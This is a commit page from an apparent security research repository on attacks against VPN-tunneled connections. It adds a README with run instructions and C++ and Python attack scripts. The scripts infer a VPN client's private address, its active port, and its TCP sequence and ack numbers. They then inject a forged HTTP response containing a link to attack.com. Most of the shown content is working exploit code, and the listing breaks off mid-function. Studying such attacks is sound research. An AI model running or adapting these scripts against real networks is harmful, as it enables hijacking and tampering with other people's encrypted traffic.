Browse Source

adding original attack test scripts and demos

master
Beau Kujath 4 years ago
parent
commit
5882c33314
  1. 78
      README.md
  2. 37
      client-side-attack/complete_attack/attack.sh
  3. 2
      client-side-attack/first_phase/Makefile
  4. 10
      client-side-attack/first_phase/phase_one_attack.sh
  5. 204
      client-side-attack/first_phase/send.cpp
  6. 155
      client-side-attack/first_phase/slow_p1.py
  7. 12
      client-side-attack/rebuild_all.sh
  8. 2
      client-side-attack/sec_phase/Makefile
  9. 241
      client-side-attack/sec_phase/send.cpp
  10. 2
      client-side-attack/third_phase/Makefile
  11. 694
      client-side-attack/third_phase/send.cpp
  12. BIN
      demos/fb-mitm-firefox.mp4
  13. BIN
      demos/nsl-brack.mp4
  14. BIN
      demos/wa-jack.mov
  15. 83
      old-readme
  16. BIN
      pcaps/client-side-caps/nping-examples/.setup.txt.swp
  17. BIN
      pcaps/client-side-caps/nping-examples/attacker/phase2_nping_attacker.pcap
  18. BIN
      pcaps/client-side-caps/nping-examples/attacker/phase3_nping_attacker.pcap
  19. 28
      pcaps/client-side-caps/nping-examples/setup.txt
  20. BIN
      pcaps/client-side-caps/nping-examples/victim/phase2_nping_vic.pcap
  21. BIN
      pcaps/client-side-caps/nping-examples/victim/phase3_nping_vic.pcap
  22. 19
      pcaps/client-side-caps/washu-demo/setup.txt
  23. BIN
      pcaps/client-side-caps/washu-demo/vic_any_capture_wash.pcap
  24. BIN
      pcaps/client-side-caps/washu-demo/wash_attacker.pcap
  25. BIN
      pcaps/server-side-caps/other-end-dns-inject.pcapng
  26. BIN
      results/results.tar.gz
  27. 2
      server-side-attack/dns-sside/full_scan/Makefile
  28. 12
      server-side-attack/dns-sside/full_scan/inject_test.sh
  29. 619
      server-side-attack/dns-sside/full_scan/send.cpp
  30. 2
      server-side-attack/dns-sside/phases/udder_fillup/Makefile
  31. 23545
      server-side-attack/dns-sside/phases/udder_fillup/fill_log.txt
  32. 26
      server-side-attack/dns-sside/phases/udder_fillup/fillup.blah
  33. 165
      server-side-attack/dns-sside/phases/udder_fillup/send.cpp
  34. BIN
      server-side-attack/dns-sside/phases/udder_fillup/uud_send
  35. 2
      server-side-attack/dns-sside/phases/udder_test/Makefile
  36. 119
      server-side-attack/dns-sside/phases/udder_test/send.cpp
  37. BIN
      server-side-attack/dns-sside/phases/udder_test/uud_send
  38. 2
      server-side-attack/tcp-sside/Makefile
  39. 230
      server-side-attack/tcp-sside/send.cpp
  40. 72
      virtual-test-environment/README.md
  41. 70
      virtual-test-environment/boot_all.sh
  42. 36
      virtual-test-environment/destroy_all.sh
  43. BIN
      virtual-test-environment/diagrams/virtlab-setup.jpg
  44. 1
      virtual-test-environment/edgers/client/.vagrant/machines/default/virtualbox/vagrant_cwd
  45. 20
      virtual-test-environment/edgers/client/Vagrantfile
  46. 20
      virtual-test-environment/edgers/client/copy_client_config.sh
  47. 14
      virtual-test-environment/edgers/client/setup_net.sh
  48. 650
      virtual-test-environment/edgers/client/ubuntu-xenial-16.04-cloudimg-console.log
  49. 28
      virtual-test-environment/edgers/setups/add_nat.sh
  50. 6
      virtual-test-environment/edgers/setups/add_tun_rule.sh
  51. 15
      virtual-test-environment/edgers/setups/attacker/connect.sh
  52. 17
      virtual-test-environment/edgers/setups/attacker/mitm_setup.sh
  53. 33
      virtual-test-environment/edgers/setups/attacker/setup_attacker.sh
  54. 29
      virtual-test-environment/edgers/setups/attacker/setup_nat.sh
  55. 8
      virtual-test-environment/edgers/setups/attacker/strip.sh
  56. 38
      virtual-test-environment/edgers/setups/dns/bind_config/bind.keys
  57. 12
      virtual-test-environment/edgers/setups/dns/bind_config/db.0
  58. 13
      virtual-test-environment/edgers/setups/dns/bind_config/db.127
  59. 12
      virtual-test-environment/edgers/setups/dns/bind_config/db.255
  60. 14
      virtual-test-environment/edgers/setups/dns/bind_config/db.empty
  61. 14
      virtual-test-environment/edgers/setups/dns/bind_config/db.local
  62. 11
      virtual-test-environment/edgers/setups/dns/bind_config/named.conf
  63. 30
      virtual-test-environment/edgers/setups/dns/bind_config/named.conf.default-zones
  64. 8
      virtual-test-environment/edgers/setups/dns/bind_config/named.conf.local
  65. 39
      virtual-test-environment/edgers/setups/dns/bind_config/named.conf.options
  66. 4
      virtual-test-environment/edgers/setups/dns/bind_config/rndc.key
  67. 20
      virtual-test-environment/edgers/setups/dns/bind_config/zones.rfc1918
  68. 19
      virtual-test-environment/edgers/setups/dns/install_docker.sh
  69. 13
      virtual-test-environment/edgers/setups/dns/start_dns.sh
  70. 59
      virtual-test-environment/edgers/setups/vpn_server/make_client_configs.sh
  71. 106
      virtual-test-environment/edgers/setups/vpn_server/setup_vpn.sh
  72. 1
      virtual-test-environment/edgers/vpn-server/.vagrant/machines/default/virtualbox/vagrant_cwd
  73. 20
      virtual-test-environment/edgers/vpn-server/Vagrantfile
  74. 13
      virtual-test-environment/edgers/vpn-server/copy_vpn_setup.sh
  75. 14
      virtual-test-environment/edgers/vpn-server/setup_net.sh
  76. 653
      virtual-test-environment/edgers/vpn-server/ubuntu-xenial-16.04-cloudimg-console.log
  77. 1
      virtual-test-environment/edgers/web-server/.vagrant/machines/default/virtualbox/vagrant_cwd
  78. 19
      virtual-test-environment/edgers/web-server/Vagrantfile
  79. 9
      virtual-test-environment/edgers/web-server/copy_dns_setup.sh
  80. 14
      virtual-test-environment/edgers/web-server/setup_net.sh
  81. 648
      virtual-test-environment/edgers/web-server/ubuntu-xenial-16.04-cloudimg-console.log
  82. 1
      virtual-test-environment/routers/gateway/.vagrant/machines/default/virtualbox/vagrant_cwd
  83. 21
      virtual-test-environment/routers/gateway/Vagrantfile
  84. 54
      virtual-test-environment/routers/gateway/setup_net.sh
  85. 654
      virtual-test-environment/routers/gateway/ubuntu-xenial-16.04-cloudimg-console.log
  86. 1
      virtual-test-environment/routers/router1/.vagrant/machines/default/virtualbox/vagrant_cwd
  87. 21
      virtual-test-environment/routers/router1/Vagrantfile
  88. 11
      virtual-test-environment/routers/router1/copy_attacker_setup.sh
  89. 14
      virtual-test-environment/routers/router1/disable_stuff.sh
  90. 62
      virtual-test-environment/routers/router1/setup_net.sh
  91. 666
      virtual-test-environment/routers/router1/ubuntu-xenial-16.04-cloudimg-console.log
  92. 1
      virtual-test-environment/routers/router2/.vagrant/machines/default/virtualbox/vagrant_cwd
  93. 21
      virtual-test-environment/routers/router2/Vagrantfile
  94. 62
      virtual-test-environment/routers/router2/setup_net.sh
  95. 672
      virtual-test-environment/routers/router2/ubuntu-xenial-16.04-cloudimg-console.log
  96. 1
      virtual-test-environment/routers/router3/.vagrant/machines/default/virtualbox/vagrant_cwd
  97. 21
      virtual-test-environment/routers/router3/Vagrantfile
  98. 62
      virtual-test-environment/routers/router3/setup_net.sh
  99. 663
      virtual-test-environment/routers/router3/ubuntu-xenial-16.04-cloudimg-console.log
  100. 87
      virtual-test-environment/start_all.sh

78
README.md

@ -1,2 +1,80 @@
# vpn-attacks
##### Attack Machine Environment
* C++
* libtins (http://libtins.github.io/download/)
## Server-side attack
#### Requirements
* VPN client connected to a VPN server
* Attack machine sitting somewhere in between VPN server and client forwarding all traffic between the two
***Note:*** Full virtual test environment setup for the server-side attack is detailed in the README within the `virt-lab` folder
#### Running the DNS Attack Script
1. Change to udp-dns attack folder - `cd other-end-attack/dnuss/full_scan`
2. Compile attack script - `make`
3. Check to make sure vpn server has a conntrack entry for some vpn client's dns lookup (on vpn-server vm): `sudo conntrack -L | grep udp`
3. Try to inject from attack router - `sudo ./uud_send <dns_server_ip> <src_port (53)> <vpn_server_ip> <start_port> <end_port>`
## Client-side attack
#### Requirements
* VPN client connected to a VPN server
* Reverse path filtering disabled on the VPN client machine
* Attack router acting as the local network gateway for the victim (VPN client) machine
#### Running the Full Attack Script
* Rebuild all the attack scripts: `./rebuild_all.sh`
* `cd full_attack`
* Change `attack.sh` vars to appropriate values
* `sh attack.sh <remote_ip>`
***Note:*** `remote_ip` specifies the IP address of the HTTP site.
#### Testing Indivual attack phases
##### Phase 1 - Infer victim's private address
* `cd first_phase`
* `python3 send.py <victim_public_ip> <private_ip_range>`
***Note:*** `private_ip_range` specifies a `/24` network such as `10.7.7.0`.
##### Phase 2 - Infer the port being used to talk to some remote address
* `cd sec_phase`
* Edit `send.cpp` to use the correct MAC addresses
* `g++ send.cpp -o send -ltins`
* `./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip>`
***Note:*** `<remote_ip>` is the address we wanna check if the client is connected to and the `<remote_port>` is almost always 80 or 443. The `<victim_wlan_ip>` is the public address of the victim and `<victim_priv_ip>` was found in phase 1. If the scripts not sniffing any challenge acks, then edit the `send.cpp` file to uncomment the `cout` line that prints out the remainder to check if the size of the encrypted packets has slightly changed on this system.
##### Phase 3 - Infer exact sequence number and in-window ack
* `cd third_phase`
* Edit `send.cpp` to use the correct MAC addresses
* `g++ send.cpp -o send -ltins`
* `./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip> <victim_port>`
***Note:*** `<victim_port>` was found in phase 2. This script currently just injects a hardcoded string into the TCP connnection but could be easily modified.

37
client-side-attack/complete_attack/attack.sh

@ -0,0 +1,37 @@
REMOTE_ADDR=$1
REMOTE_PORT=80
VICTIM_WLAN_ADDR=192.168.12.58 # vpn client public ip
WLAN_GATEWAY=192.168.12.1 # address of local network gateway
VICTIM_PRIV_NET=10.7.2.0 # nord uses 10.7.2.x typically
PRIV_NETMASK=255.255.255.0
REQUEST_SIZE=529
DEST_MAC=a4:34:d9:53:92:c4
INTERFACE=wlp1s0
echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 1 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo `date`
echo "attempting to infer client's private VPN address.."
cd ../first_phase
PRIV_IP="$(./send_p1 $DEST_MAC $VICTIM_PRIV_NET $PRIV_NETMASK $WLAN_GATEWAY $INTERFACE)"
echo "phase 1 client private IP: ${PRIV_IP}"
echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 2 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo `date`
echo "determining if client is talking to ${REMOTE_ADDR} on any port.."
cd ../sec_phase
VPORT="$(./send_p2 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC)"
echo "phase 2 port result: ${VPORT}"
echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 3 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo `date`
echo "beginning phase 3 to infer sequence and ack numbers needed to inject.."
cd ../third_phase
./send_p3 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $VPORT $REQUEST_SIZE
echo `date`

2
client-side-attack/first_phase/Makefile

@ -0,0 +1,2 @@
all:
g++ -O3 -o send_p1 send.cpp -lpthread -ltins -std=c++11

10
client-side-attack/first_phase/phase_one_attack.sh

@ -0,0 +1,10 @@
#/bin/bash
./phase_one_attack 52:54:00:12:ae:4c\
52:54:00:12:ae:3f\
10.7.1.0\
255.255.255.0\
192.168.64.1\
ens5\
35220\
443

204
client-side-attack/first_phase/send.cpp

@ -0,0 +1,204 @@
/*
* Modified from http://libtins.github.io/examples/syn-scanner/
*
* INCLUDED COPYRIGHT
* Copyright (c) 2016, Matias Fontanini
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
#include <iostream>
#include <iomanip>
#include <vector>
#include <set>
#include <string>
#include <cstdlib>
#include <pthread.h>
#include <unistd.h>
#include <tins/tins.h>
#include <tins/ip.h>
#include <tins/tcp.h>
#include <tins/ip_address.h>
#include <tins/ethernetII.h>
#include <tins/network_interface.h>
#include <tins/sniffer.h>
#include <tins/utils.h>
#include <tins/packet_sender.h>
using std::cout;
using std::endl;
using std::vector;
using std::pair;
using std::setw;
using std::string;
using std::set;
using std::runtime_error;
using namespace Tins;
typedef pair<Sniffer*, string> sniffer_data;
std::string vip;
std::string gwip;
bool verbose = false;
class Scanner {
public:
Scanner(NetworkInterface& interface,
std::string dest_mac,
std::string source_mac,
std::string gateway_ip,
std::string private_ip,
std::string private_ip_subnet_mask,
int sport,
int dport);
void run();
private:
void send_synacks();
bool callback(PDU& pdu);
static void* thread_proc(void* param);
void launch_sniffer();
NetworkInterface iface;
std::string dst_mac;
std::string src_mac;
std::string src_ip;
std::string victim_ip;
std::string victim_subnet;
int sport;
int dport;
Sniffer sniffer;
};
Scanner::Scanner(NetworkInterface& interface,
std::string dest_mac,
std::string source_mac,
std::string gateway_ip,
std::string private_ip,
std::string private_ip_subnet_mask,
int src_port,
int dst_port) : iface(interface), dst_mac(dest_mac), src_mac(source_mac), src_ip(gateway_ip), victim_ip(private_ip), victim_subnet(private_ip_subnet_mask), sport(src_port), dport(dst_port),sniffer(interface.name()) {
}
void* Scanner::thread_proc(void* param) {
Scanner* data = (Scanner*)param;
data->launch_sniffer();
return 0;
}
void Scanner::launch_sniffer() {
sniffer.sniff_loop(make_sniffer_handler(this, &Scanner::callback));
}
/* Our scan handler. This will receive SYN-ACKS and inform us
* the scanned port's status.
*/
bool Scanner::callback(PDU& pdu) {
// Find the layers we want.
const IP &ip = pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
const TCP &tcp = pdu.rfind_pdu<TCP>(); // Grab TCP layer
static int total_seen = 0;
if (ip.src_addr().to_string().rfind("10.", 0) == 0 && tcp.sport() != 22) {
if (verbose) std::cout << "Victim IP is:";
std::cout << ip.src_addr() << "\n";
vip = ip.src_addr();
total_seen += 1;
if (total_seen > 0) {
return false;
}
}
return true;
}
void Scanner::run() {
pthread_t thread;
// Launch our sniff thread.
pthread_create(&thread, 0, &Scanner::thread_proc, this);
// Start sending SYNs to port.
send_synacks();
// Wait for our sniffer.
void* dummy;
pthread_join(thread, &dummy);
}
// Send syn acks to the given ip address, using the destination ports provided.
void Scanner::send_synacks() {
// Retrieve the addresses.
PacketSender sender;
IPv4Range ip_range = IPv4Range::from_mask(victim_ip, victim_subnet);
for (const IPv4Address &addr : ip_range) {
EthernetII pkt = EthernetII(dst_mac, src_mac) / IP(addr, src_ip) / TCP(dport, sport);
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::ACK, 1);
tcp.set_flag(TCP::SYN, 1);
if (verbose) std::cout << "Sending to IP:" << addr << std::endl;
sender.send(pkt, iface);
sender.send(pkt, iface);
usleep(10);
}
}
void scan(int argc, char* argv[]) {
std::string dst_mac = argv[1]; // victim MAC address
std::string src_mac = ""; // src mac does not matter
std::string private_ip_subnet = argv[2];
std::string private_ip_subnet_mask = argv[3];
gwip = argv[4]; // IP of server that client is talking to
int sport = 80; // source, dest port for phase-1 are arbitrary
int dport = 80;
IPv4Address ip(gwip);
// Resolve the interface which will be our gateway
NetworkInterface iface(ip);
if (verbose) cout << "Sniffing on interface: " << iface.name() << endl;
// Consume arguments
Scanner scanner(iface, dst_mac, src_mac, gwip, private_ip_subnet,
private_ip_subnet_mask, sport, dport);
scanner.run();
}
int main(int argc, char* argv[]) {
if (argc != 6) {
std::cout << "usage: ./send <DST_MAC> <PRIVATE IP SUBNET> <PRIVATE IP SUBNET MASK> <SOUCE IP> <IFACE>\n";
exit(-1);
}
try {
scan(argc, argv);
}
catch(runtime_error& ex) {
cout << "Error - " << ex.what() << endl;
}
}

155
client-side-attack/first_phase/slow_p1.py

@ -0,0 +1,155 @@
#!/usr/bin/env python3
from scapy.all import *
import ipaddress
from threading import Thread, Event
from time import sleep
import os
#
#
#
#
# Thread classes for sniffing
#
# Sniffer Class all grabbed from https://www.cybrary.it/0p3n/sniffing-inside-thread-scapy-python/
class Sniffer(Thread):
def __init__(self, iface="en0"):
super().__init__()
self.daemon = True
self.vpn_addr = None
self.current_phase = 1
self.spoof_count = 0
self.spoof_port = 0
self.socket = None
self.iface = iface
self.stop_sniffer = Event()
def run(self):
self.socket = conf.L2listen(
type=ETH_P_ALL,
iface=self.iface,
filter="ip"
)
sniff(
opened_socket=self.socket,
prn=self.handle_packet,
)
def join(self, timeout=None):
self.stop_sniffer.set()
super().join(timeout)
def get_vpn_addr(self):
return self.vpn_addr
def set_phase(self, phase):
self.current_phase = phase
def check_for_req(self, packet):
ip_layer = packet.getlayer(IP)
# for phase 1 (on ubuntu 19) we wanna look for a reset
# with source of private vpn address and dest of gateway
if self.current_phase == 1:
if "10." in ip_layer.src:
if ip_layer.src == self.vpn_addr:
print("multiple matches for: " + str(self.vpn_addr))
# could make the scan stop after this point but
# only takes a second or two to finish up
print("Victim private ip is: " + str(ip_layer.src))
self.vpn_addr = ip_layer.src
def handle_packet(self, packet):
#ip_layer = packet.getlayer(IP)
#print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))
# if its not an SSH packet then check for challenge acks
#
if TCP in packet:
tcp_sport = packet[TCP].sport
tcp_dport = packet[TCP].dport
if (tcp_sport != 2222 and tcp_dport != 2222) or (tcp_sport != 22 and tcp_dport != 22):
self.check_for_req(packet)
############
def phase_one_spread(gateway_ip, dst_net, iface="en0", edst="08:00:27:5c:c9:d1",
sport=50505, dport=443, flags="SA"):
pieces = gateway_ip.split('.')
src = pieces[0] + '.' + pieces[1] + '.' + pieces[2] + '.1'# should be gateway of LAN
src = gateway_ip
eth = Ether(dst=edst)
tcps = TCP(sport=sport,dport=dport,flags=flags) # src and dst ports don't matter
for ip in ipaddress.IPv4Network(dst_net + '/24'):
print('{} to: {}'.format(flags, str(ip)))
ip_pack = IP(src = src, dst = str(ip))
sendp(eth/ip_pack/tcps, iface=iface, count=2, verbose=0)
print("\nFinished spreading to private address space.")
def main():
if len(sys.argv) < 5:
print("Usage:\n{} {} {} {} {} [{}] [{}]".format(
sys.argv[0], "<GATEWAY_IP>", "<VPN SUBNET>", "<IFACE>", "<VICTIM_MAC>",
"<SPORT>", "<>"))
exit(-1)
gateway_ip = sys.argv[1]
vpn_net = sys.argv[2]
iface = sys.argv[3]
edst = sys.argv[4]
if len(sys.argv) == 6:
sport = int(sys.argv[5])
else:
sport = 50505
if len(sys.argv) == 7:
dport = int(sys.argv[6])
else:
dport = 443
if len(sys.argv) == 8:
flags = sys.argv[7]
else:
flags = "SA"
sniffer = Sniffer(iface=iface)
sniffer.start()
## Phase 1 - spread private address range passed in
#
sleep(.5)
print("Scanning entire dest net " + str(vpn_net))
phase_one_spread(gateway_ip, str(vpn_net),
iface=iface, edst=edst,
sport=sport, dport=dport, flags=flags)
vpn_addr = sniffer.get_vpn_addr()
print('Completed phase one and found client has private VPN address: ' + str(vpn_addr) + '\n\n')
if __name__ == '__main__':
main()

12
client-side-attack/rebuild_all.sh

@ -0,0 +1,12 @@
echo "Remaking each attack phase script..."
cd ./first_phase
make
cd ../sec_phase
make
cd ../third_phase
make
echo "Finished building attack scripts."

2
client-side-attack/sec_phase/Makefile

@ -0,0 +1,2 @@
all:
g++ -O3 -o send_p2 send.cpp -lpthread -ltins -std=c++11

241
client-side-attack/sec_phase/send.cpp

@ -0,0 +1,241 @@
#include <tins/tins.h>
#include <cassert>
#include <iostream>
#include <string>
#include <unistd.h>
#include <thread>
using std::thread;
using std::cout;
using std::string;
using namespace Tins;
int current_spoof_port, best_port, chack_count;
bool sniffed_chack = false;
bool is_running = true;
bool verbose = false;
bool count_chacks = false;
bool quick_mode = true; // if true we don't recheck the port
int num_sent = 0;
string victim_wlan_addr;
string remote_addr;
void print_divider(int count) {
int i = 0;
while (i < count) {
if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
i++;
}
}
bool handle_packet(PDU &some_pdu) {
const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
// keep track of the last port we spoofed
if (ip.src_addr() == remote_addr) current_spoof_port = some_pdu.rfind_pdu<TCP>().dport();
if (ip.src_addr() == victim_wlan_addr) { // the packet is a response from the client
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
//cout << "sniffed something: " <<payload << "\n";
const int remainder = payload % 67; // 67 is the size of encrypted resets on ubuntu
if (remainder != 0) {
//cout << "\nsniffed something important - port : " << (current_spoof_port) << ", remainder : " << remainder << "\n";
// If it's not working as expected, uncomment the line above to
// check what the typical remainder is looking like as it scans the
// port range. In this case, ubuntu 19, if you uncomment the line above
// it would repeatedly sniff 41 packets until the correct port, then it
// would sniff a 48 packet
if (remainder != 41 && (remainder == 40 || remainder == 48)) { // the size of the remainder could change per OS
if (verbose) cout << "sniffed chack - port : " << (current_spoof_port) << ", remainder : " << remainder <<", full size: " << payload << "\n";
if (count_chacks) chack_count ++;
if (verbose) cout << "some other val: " << ((payload - 79) % 67) << "\n";
if (!sniffed_chack) {
sniffed_chack = true;
best_port = current_spoof_port;
}
}
}
}
return is_running;
}
void sniff_stuff() {
SnifferConfiguration config;
config.set_promisc_mode(true);
Sniffer sniffer("wlp1s0", config);
sniffer.sniff_loop(handle_packet);
}
bool rechack(int num_checks, int possible_port, string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) {
PacketSender sender;
NetworkInterface iface("wlp1s0");
count_chacks = true;
chack_count = 0;
EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(victim_ip, source_ip) / TCP(possible_port, sport);
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::SYN, 1);
int count = 0;
usleep(1000000 / 2);
while (count < num_checks) {
sender.send(pkt, iface);
usleep(1000000 / 2); // must sleep half second due to chack rate limit
count ++;
}
usleep(1000000);
// should have just sniffed as many chacks as we just sent
if (verbose) cout << "end of rechack, count : " << chack_count << ", should be: " << num_checks << " \n";
if (chack_count >= num_checks) {
return true;
}
count_chacks = false;
num_sent += count;
return false;
}
// Spreads SYNs across the victim's entire port range
// coming from a specific remote_ip:port
//
int phase_two_spread(string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) {
PacketSender sender;
NetworkInterface iface("wlp1s0");
int start_port = 39000;//32768; // typical Linux ephemeral port range - (32768, 61000)
int end_port = 42000;//61000;
int i;
EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(victim_ip, source_ip) / TCP(40404, sport);
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::SYN, 1);
int current_port = best_port;
for (i = start_port; i < end_port; i ++) {
tcp.dport(i); // set the packets dest port to current guess
sender.send(pkt, iface);
num_sent ++;
usleep(10);
}
usleep(1000000); // sleep to give victim time to respond w chack
current_port = best_port;
if (verbose) cout << "finished round 1 w guessed port: " << current_port << "\n";
// In round 1 we spoofed fast (10 sleep) to get a good estimate of the
// port in use. Round 2, we spoof slower from about 50 packets back to account
// for the delay in response and hopefully get the exact port number in use
print_divider(1);
usleep(1000000 / 2);
sniffed_chack = false;
int j;
int send_delay = 300;
if (verbose) cout << "Starting round 2 spread from: " << (current_port - send_delay) << " to " << current_port << "\n";
for (j = (current_port - send_delay); j < current_port; j++) {
tcp.dport(j); // set the packets dest port to current guess
sender.send(pkt, iface);
num_sent ++;
usleep(600 * 5);
}
usleep(1000000);
if (verbose) cout << "finished round 2 w guessed port: " << best_port << "\n";
return best_port;
}
int find_port(string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) {
bool is_found = false;
int current_port = 0;
while (!is_found) {
current_port = phase_two_spread(dest_mac, src_mac, remote_addr, sport, victim_ip);
print_divider(1);
if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n";
cout << current_port << "\n";
if (quick_mode) {
is_found = true;
} else {
is_found = rechack(2, current_port, dest_mac, src_mac, remote_addr, sport, victim_ip);
}
}
return current_port;
}
int main(int argc, char** argv) {
if (argc != 5 && argc != 6) {
cout << "sike wrong number of args ---> (remote_addr, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr)\n";
return 0;
}
remote_addr = argv[1];
int sport = atoi(argv[2]);
victim_wlan_addr = argv[3];
string dest_ip = argv[4];
//verbose = true;
string dest_mac = argv[5];
string src_mac = "";
print_divider(2);
thread sniff_thread(sniff_stuff);
int p = find_port(dest_mac, src_mac, remote_addr, sport, dest_ip);
is_running = false;
sniff_thread.detach();
//sniff_thread.join();
print_divider(1);
if (verbose) cout << "Completed phase 2 with port: " << p << "\n\n";
cout << p << "\n";
return p;
}

2
client-side-attack/third_phase/Makefile

@ -0,0 +1,2 @@
all:
g++ -O3 -o send_p3 send.cpp -lpthread -ltins -std=c++11

694
client-side-attack/third_phase/send.cpp

@ -0,0 +1,694 @@
#include <tins/tins.h>
#include <cassert>
#include <iostream>
#include <string>
#include <unistd.h>
#include <thread>
using std::thread;
using std::cout;
using std::vector;
using namespace Tins;
long current_spoof_seq;
long current_spoof_ack;
long current_min_ack;
long best_seq = 0;
long best_ack;
vector<long> possible_seqs;
vector<long> possible_acks;
int num_sent = 0;
int current_round = 1;
bool ack_search = false;
bool track_nums = false;
bool count_chacks = false;
bool sniffed_chack = false;
bool show = false;
bool testing = true; // if using netcat set to true, else false
int sniff_request = 0; // 0 = off, 1 = sniffing for request, 2 = sniffed that request
std::string victim_wlan_addr, dest_ip, remote_addr;
int sport, dport, request_size, chack_count;
std::string dest_mac; // victim mac addr
std::string src_mac = ""; // src mac doesn't matter
void print_divider(int count) {
int i = 0;
while (i < count) {
cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
i++;
}
}
int inject_junk(long exact_seq, long in_win_ack) {
PacketSender sender;
NetworkInterface iface("wlp1s0");
std::string message = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 84\r\nConnection: keep-alive\r\n\r\n<h1><a href=\"https://attack.com\">Just some junk here..</a></h1>";
EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU(message);;
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::PSH, 1);
tcp.set_flag(TCP::ACK, 1);
tcp.seq(exact_seq);
tcp.ack_seq(in_win_ack);
print_divider(2);
cout << "attempting to inject garbage into the connection..\n";
cout << "injected seq: " << exact_seq << ", in-win ack: " << in_win_ack << "\n";
sender.send(pkt, iface);
num_sent ++;
return 1;
}
// Send the same probe a number of times
// to see if the same amount of responses are
// triggered from the client
//
bool rechack(long seq, long ack, int num_checks) {
PacketSender sender;
NetworkInterface iface("wlp1s0");
count_chacks = true;
EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");;
TCP& tcp = pkt.rfind_pdu<TCP>();
if (ack == 0) {
tcp.set_flag(TCP::RST, 1);
} else {
tcp.set_flag(TCP::PSH, 1);
tcp.set_flag(TCP::ACK, 1);
tcp.ack_seq(ack);
}
tcp.seq(seq);
chack_count = 0;
int count = 0;
usleep(1000000 / 2);
while (count < num_checks) {
sender.send(pkt, iface);
num_sent ++;
usleep(1000000 / 2 * 1.2); // must sleep half second due to chack rate limit
count ++;
}
usleep(1000000);
// should have just sniffed as many chacks as we just sent
cout << "end of rechack, count was: " << chack_count << ", should be: " << num_checks << " \n";
if (chack_count >= num_checks) {
return true;
}
count_chacks = false;
return false;
}
// Use the fact the client will respond to empty PSH-ACKs
// that have an in window ack AND a sequence number less than the exact
// next expected sequence, with chall-acks to infer exact sequence num
//
long find_exact_seq(long in_win_seq, long in_win_ack, int send_delay) {
PacketSender sender;
NetworkInterface iface("wlp1s0");
EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");;
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::PSH, 1);
tcp.set_flag(TCP::ACK, 1);
tcp.ack_seq(in_win_ack);
count_chacks = false;
track_nums = false;
long min_seq = in_win_seq - 200; // assuming the in_window_seq is within 200 of the left edge of window
sniffed_chack = false;
long curr_seq = in_win_seq;
// Continually decrement the in window sequence number
// until we sniff a chack which means we just passed the
// left edge of the sequence window
//
print_divider(1);
bool is_found = false;
while (!is_found) {
long j = curr_seq;
sniffed_chack = false;
while (j > min_seq && !sniffed_chack) {
usleep(send_delay);
cout << "spoofing with seq: " << j << "\n";
tcp.seq(j);
sender.send(pkt, iface);
num_sent ++;
j -= 1;
}
usleep(100000);
